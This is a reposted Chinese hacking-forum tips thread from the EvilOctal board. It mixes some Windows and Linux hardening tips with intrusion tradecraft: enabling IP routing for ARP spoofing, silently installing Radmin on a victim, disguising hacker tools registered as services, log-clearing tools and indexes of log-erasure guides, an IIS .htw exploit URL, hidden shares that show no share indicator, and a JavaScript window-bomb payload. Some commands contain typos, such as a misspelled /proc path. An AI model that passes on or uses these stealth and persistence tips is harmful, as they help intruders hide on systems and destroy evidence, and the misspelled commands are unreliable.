信息来源：邪恶八进制 中国

本帖发一些基础性的Hack小技巧 或者是基础问题的解答...
楼号就是帖的数字了：）
大家可以跟....格式一样就好了...

TIPS里严禁灌水 否则杀

禁止远程访问注册表

In order to keep your data away from the black hats, you should do more about your system, just like pay more attention to the remote registry service!!!

方法一、
右键单击‘我的电脑’，选‘管理’，‘服务和应用程序’，‘服务’！
停止并且禁用Remote Registry Service服务！

方法二、
打开注册表编辑器的如下键：
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers
把其下的WinReg的键职改成1就可以了。

禁止非管理员用户使用AT命令

这个小技巧的好处应该不言而喻：）

启动注册表编辑器，展开如下键：
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
在右边新建立一个SubmitControl键名，DWORD值为1。

使LINUX对PING不响应

LINUX应该逐渐成为各位大峡小鸟手中之宝了吧？怎么才能让它不响应ICMP来保护自己呢？

可以用：
echo 1 > /proc/sys/net/ipv4/icmp_echo_igore_all
想恢复的时候用：
echo 0 > /proc/sys/net/ipv4/icmp_echo_igore_all

让WIN98安全模式支持网络

大家都知道WIN98安全模式要是可以进去，是可以不受网吧安全管理软件的约束的！BUT安全模式不加载网络驱动，下面冰血告诉你一种让WIN98的安全模式提供网络支持的方法。

1、F8进入安全模式。
2、选择Command Prompt Only。
3、进入命令行状态时，输入Win /d:n即可以进入代命令行的安全模式。

修改Terminal Server的端口

服务端
进入注册表编辑器，依次展开如下键名：
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp
在右窗口中修改PortNumber的数值为任意端口号，推荐1025<端口号<65535
客户端
启动Terminal Server Client的客户端管理器，到出连接文件为*.cns，用记事本打开修改Server Port与服务器一致就OK了.
最后将修改过的*.cns重新导入Terminal Server Client的客户端管理器。启动IP路由功能

一般我们在WINDOWSNT/2K/XP使用ARP欺骗攻击的时候都需要先打开IP路由功能。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
IPEnableRouter=0x1

强大的FC对比命令

我们在使用系统和进行各种任务的时候经常需要用到文件的对比，那么我们是自己一点点的对比么？当然不是我们用强大的FC对比命令。
具体参数请用FC /?进行查看

通过验证Banner手工鉴别FTP

cmd下输入
ftp TargetIP
User (TargetIP:(none)):ftp
331 User name okey, please send complete E-mail address as password.
Password:
如果成功
230 User logged in, proceed.
如果失败
530 Sorry, no ANONYMOUS access allowed.

特别是这一行字是Serv-U的特有标志
331 User name okey, please send complete E-mail address as password.

假如是MS FTP呢
cmd下输入
ftp TargetIP
220 antivirus Microsoft FTP Serveice(Version 5.0).
User (TargetIP:(none)): ftp
331 Password required for ftp.
Password:
530 User ftp cannot log in.
特别是这一行字是MS FTP的特有标志
331 Password required for ftp.

漏洞qsumrhit.htw和iirturnh.htw的使用方法

这个比较希奇，还是说说：
提交例如如下的连接就可以了……
连接http://www.xxxx.com/iissamples/i ... p;cihilitetype=full

远程控制软件Radmin安装注意事项

网络渗透中。使用远程安装Radmin的进行控制时候，必须使用如下命令：
Radmin /install /silence
否则对方的计算机窗口会弹出一个提示框说“远程管理服务已经安装”。

终端服务客户端的操作问题

注意，通过克隆而获得管理员权限的用户是和管理员共用一个桌面的。如果你在桌面建立东西，管理员那边是同样可以看见的。

注册成服务的黑客软件的各项指标修改方法

假如你已经吧一个叫hackertools的工具注册成了系统的服务，在服务列表中存在。那么你要怎么修改他的名字呢？
这里进入注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
找到它的服务名，假设是hcktol，现在展开他的下面间。
displayname就是服务显示名
description就是服务描述
另外可以通过用16进制编辑器修改服务进程名。
用辅助工具instsrv.vbs把程序安装成自己的指定服务名和服务相识名服务。具体请看帮助，到处有下。

有关清除日志的话题
By 冰血封情

http://www.EvilOctal.com/forum/read.php?tid=1881
http://www.EvilOctal.com/forum/read.php?tid=1821
http://www.EvilOctal.com/forum/read.php?tid=1781
http://www.EvilOctal.com/forum/read.php?tid=1610
http://www.EvilOctal.com/forum/read.php?tid=1581
http://www.EvilOctal.com/forum/read.php?tid=1490
http://www.EvilOctal.com/forum/read.php?tid=1429
http://www.EvilOctal.com/forum/read.php?tid=1337
http://www.EvilOctal.com/forum/read.php?tid=1236
http://www.EvilOctal.com/forum/read.php?tid=992
http://www.EvilOctal.com/forum/read.php?tid=942
http://www.EvilOctal.com/forum/read.php?tid=594
http://www.EvilOctal.com/forum/read.php?tid=196
http://www.eviloctal.com/forum/read.php?tid=2016

以上是在 邪恶八进制（EvilOctal）暨安全高峰（SecurityPeak）论坛上 以关键字为“日志”的资料索引 分别对应如下主题：

[转帖]3389如何擦除日志
[转载]关于入侵检测系统之日志检测详解
[转载]入侵检测之日志检测
[转载]国外的培训课程 安全日志的秘密
[转载]Windows日志的保护与伪造
[转载]用perl写了个把IIS日志导入到mysql的程序
[转载]终端服务的日志监控
[转载]删除sql server日志
[转载]WINDOWS安全事件日志中的事件编号与描述
[转载]如何用elsave清除日志
[转载]FreeBSD的系统log日志
[转载]UNIX系统后门的安放和日志的擦除
[转载]安全事件日志事件编号与描述
[转载]详述Windows 2000的日志及其删除方法

共13条信息

非常感谢你支持偶们！

关于...自动清除日志软件类很多
如：
小榕的elsave清除日志工具
小榕的CleanIISLog来自动清除日志
还有CSDN公布的ClearLogs工具
以及擦PP工具0x333shadow
专业清除日志iisantidote-v2工具也可以

工具多多 自己搜索 绝大多数论坛的ToolsWay版面都有的...88

无法删除文件的问题
By 冰血封情[EST]

有时候我们要删除一些文件 经常提示无法删除 EvilOctal总结了一下 主要有以下几种可能
第一 文件名中可能有特殊符号
那么无论你是在操作系统中 还是使用命令行下的del命令都是无法删除的 这时解决方法是使用命令rd "\\?\文件路径\文件名" 就可以删除了
第二 有可能是文件正在使用中
那么只要找到正在使用该软件的进程 终止后删除 当然一般情况下也可以到安全模式或者命令行下删除的
第三 可能是文件的优先级不够高
在任务管理器里 把相关进程的优先级降低 然后再一顿狂杀乱砍
第四 也许是磁盘有逻辑错误
使用chkdsk检查一下再行删除看看

有关mid音乐格式的音轨调查

今天朋友FlyingBird传输了一个音乐给我 mid格式的 但是实在是播放不了
原来 mid音频走的是 音乐控制面版中的 软件合成器 的音轨
不想 我把他静音了 所以什么也听不见
在 主音量 控制面版里将 软件合成器 钩取消后就可以下的 静音 取消就可以放了...

在139入侵过程中遇见host not found？
By 冰血封情[EST]

在正常情况下应该是这样的：
[QUOTE]
Node IpAddress: [xxx.xxx.x.xxx] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
REFDOM <00> UNIQUE Registered
REFDOM <03> UNIQUE Registered
REFDOM <20> UNIQUE Registered
REFDOM$ <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~REFDOM.......<00> UNIQUE Registered
……

MAC Address = XX-XX-XX-XX-XX-XX
[/QUOTE]

如果对方有文件（或者打印）共享，那么就会显示类似上面的信息。如果出现的是 ‘Host Not Found’，那么就可能没有提供共享或者安装了防火墙之类的软件阻隔了，具体情况冰血封情也很难猜测了：）

3389端口开放配合输入法漏洞攻击法
By 冰血封情[EST]

这个可是个老漏洞了 当然很多菜鸟还在找 汗...
以下是邪恶八进制（EvilOctal）暨安全高峰（SecurityPeak）论坛上 截止9月10日的3389攻防主题索引
http://www.eviloctal.com/forum/read.php?tid=1881
http://www.eviloctal.com/forum/read.php?tid=1015
http://www.eviloctal.com/forum/read.php?tid=125
http://www.eviloctal.com/forum/read.php?tid=1593
http://www.eviloctal.com/forum/read.php?tid=1429
http://www.eviloctal.com/forum/read.php?tid=534
http://www.eviloctal.com/forum/read.php?tid=162
http://www.eviloctal.com/forum/read.php?tid=151
http://www.eviloctal.com/forum/read.php?tid=124
http://www.eviloctal.com/forum/read.php?tid=65
....

分别对应
[转帖]3389如何擦除日志
[转载]远程开启3389终端服务
[转载]总结开3389的5种方法
[转帖]怎么记录3389登录者的IP
[转载]终端服务的日志监控
[转载]菜鸟使用SC远程启动终端服务的误区
[转载]终端服务使用大全
[转载]修改终端服务端口的方法
[转载]远程启动终端服务最简单的方法
[转载]终端服务全攻略
....

其他的请自己搜索...

JAVASCRIPT开无数窗口代码讨论

<script language="javascript">for(i=0;i<100;i++){window.open()}</script>

这个其实是早先的JAVASCRIPT网页炸弹 利用for循环或while循环不断地开窗口
具体使用方法是 在HTML的网页的BODY中插入这段代码
然后打开了就会自动跳出100个窗口

复制内容到剪贴板

代码:

<html><head><title>Hackway Power Of China</title></head>
<body bgcolor="#666696" text="#000000" id="all" leftmargin="10" topmargin="10" marginwidth="10" marginheight="10" link="#000020" vlink="#000020" alink="#000020">
<div align="center"><A HREF="" onmouseover="while(true){window.open()}">冰血封情冰雪心</A>
</div>
</body></html>

那么其实我们还可以进一步使用……
让其不点连接就直接跳出窗口
下面给出完整代码：

漫谈无标识的共享的实现以及修改硬盘图标
By 冰血封情[EST]

运行Regedit命令，打开注册表，找到下面的子键：HKEY_LOCAL_MACHINE\software\Mi-crosoft\Windows\CurrentVersion\Network\Lanman\C$,在屏幕的右边，你就可以看见下面的内容：
Flags 0x00000302(770)
Parm1enc(长度为零的二进制值)
Parm2enc(长度为零的二进制值)
Path"c:"
Remark"Remark By Scent Lily"
Type 0x00000000(0)
关键的地方就是FLAG这个参数，它的键值决定了共享目录的类型。普通共享是191，隐藏共享是102……
而我们把FLAGS的值设为302（16进制，其实就是770）就可以实现无共享标识的共享了。注意这里不但没有‘小手’，而且甚至右键菜单的‘属性’也看不出来共享哦：）GOOD LUCK

下面我们说说如何自定义硬盘图标
新建一个AutoRun.inf文件。内容如下：
[autorun]
ICON=X.ico
其中X.ico就是图标的文件名，如果不在同一目录就要写路径。

无法把文件拷贝到名字具有空格的文件夹

FAQ作者 Sunlion[EST]
今天想把一个good.bat的文件拷贝到
c:\Documents and Settings\All Users\「开始」菜单\程序\启动
但是
copy d:\good.bat c:\Documents and Settings\All Users\「开始」菜单\程序\启动
都有错误，系统提示：命令语法不正确。
大家遇到此情况，那么就可以转换以下：
先是：
cd c:\Documents and Settings\All Users\「开始」菜单\程序\启动
把c:\Documents and Settings\All Users\「开始」菜单\程序\启动  设置为当前目录
在实行：
copy d:\good.bat
就没有错了！

引用:

其实很简单, 加个引号就可以了..
copy d:\good.bat "c:\Documents and Settings\All Users\「开始」菜单\程序\启动"

原因是 c:\Documents and Settings\All Users\「开始」菜单\程序\启动 这个路径里有空格

by zhouzhen

海洋顶端2005a.asp列不出目录的问题

有的时候海阳顶端网2005a.asp在有的机器上列不出虚拟目录的文件
lcx经过多次测试发现 只要wscript.shell被删或被禁用的情况下 就会列不出目录
解决这个问题的办法是用2004.asp

在二层交换机上DHCP实现跨VLAN的服务的话题

以下是专家romemeteor的回答...
当然可以 但是必须在特定的型号上
譬如 NetGear最新 推出的 二层千兆交换机GSM7224
其 就支持
GSM7224拥有丰富的二层管理功能，包括提供网络带宽优化、网络安全、网络控制等各方面。完整的SNMP、RMON、DHCP以及BOOTP可满足你所有的交换机管理要求。先进的功能包括有多达228个VLAN、流量优先级902.1p (QoS) 可确保如VoIP等关键应用、广播风暴控制、RADIUS、IEEE802.1x基于端口的安全访问控制、端口捆绑、快速生成树协议 (RSPT)。丰富的二层功能可确保网络最大的性能、可靠、可用和可控。
而如何通过具体的命令实现它,我想看manual应该可以得到答案吧
附件为三层交换机 的 一些技术 知识 其中对VLAN有很详细的介绍
看一看 然后再理解为什么要在 大多数 都是在三层交换机上 DHCP支持VLan了;
更具体的可以 去看看
http://www.netgear.com/products/details/GSM7324.php
附件为三层交换机 的 一些技术 知识 其中对VLAN有很详细的介绍
看一看 然后再理解为什么要在 大多数 都是在三层交换机上 DHCP支持VLan了;
更具体的可以 去看看
http://www.netgear.com/products/details/GSM7324.php
呵呵 是 7324

EXE文件关联的恢复方法
By 冰血封情[EST]

很多朋友在查杀木马后，发现很多文件关联破坏了，如：.exe .txt .inf .ini等等文件都不能使用了……甚至是进硬盘的时候，双击硬盘图标都无法进入……
好了，首先我们恢复.exe文件管联：
先看看你计算机里面.com的文件可以使用么？如果可以，那么就接着往下；如果不可以，就要另外想办法（根据中国暗域网络成员&#39;鱼&#39;的情况，.com是可以使用的）。
我们这里修复环境以&#39;于戬&#39;的为准——WINDOWS98操作系统+.com文件可以使用+硬盘可以进入+.exe .txt破坏
方法一、
恢复.exe具体方法如下：
1、在&#39;文件夹选项&#39;里设置&#39;显示所有文件&#39;，并且取消对&#39;隐藏已知文件的扩展名&#39;的选择。
2、在&#39;开始&#39;-&#39;搜索&#39;里对C盘搜索regedit.exe文件，这个regedit.exe是注册表编辑器，解决问题需要它。
3、搜索到了后，把regedit.exe改名为regedit.com，然后双击打开，你可以进入注册表编辑器了。
4、依次进入注册表编辑器如下键&#39;HKEY_CLASSES_ROOT\exefile\shell\open\command&#39;，双击右窗口中的&#39;默认&#39;键名，将它的键值修改为%1 %*后按F5刷新注册表就可以了。
5、关闭注册表编辑器，看是不是恢复了？
恢复.txt具体方法如下：
第一种方法
1、在桌面上新建立一个&#39;文本文件&#39;，然后按住键盘上的SHIFT键，同时用鼠标右键单击，在菜单中选择&#39;打开方式&#39;，找到wordpad（写字板）选中它，并且选中&#39;始终用此程序打开&#39;，点&#39;确定&#39;。
2、同样是刚才那个&#39;文本文件&#39;，再按住键盘上的SHIFT键，同时用鼠标右键单击，在菜单中选择&#39;打开方式&#39;，找到NOTEPAD（记事本）选中它，并且也选中&#39;始终用此程序打开&#39;，点&#39;确定&#39;。
3、现在看看你的.txt文件关联恢复了么？
第二种方法<